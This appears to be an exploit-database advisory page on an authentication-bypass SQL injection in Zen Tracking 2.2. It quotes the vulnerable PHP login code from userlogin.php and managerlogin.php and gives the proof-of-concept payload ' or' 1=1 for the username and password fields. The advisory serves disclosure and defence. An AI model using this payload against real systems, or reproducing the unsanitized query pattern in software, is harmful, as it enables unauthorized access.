Zen Tracking - exploit.company

vendor:

Zen Tracking

by:

cr4wl3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Zen Tracking

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: a:ringsworld:zentimetracking

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability

Zen Tracking version 2.2 and below is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying specially crafted input to the username and password fields of the userlogin.php and managerlogin.php scripts. By supplying the username and password values of ' or' 1=1, an attacker can bypass authentication and gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/

[+] Vuln Code : 

[userlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/userlogin.php

username: ' or' 1=1
Password: ' or' 1=1


[+] Vuln Code : 

[managerlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/managerlogin.php

username: ' or' 1=1
Password: ' or' 1=1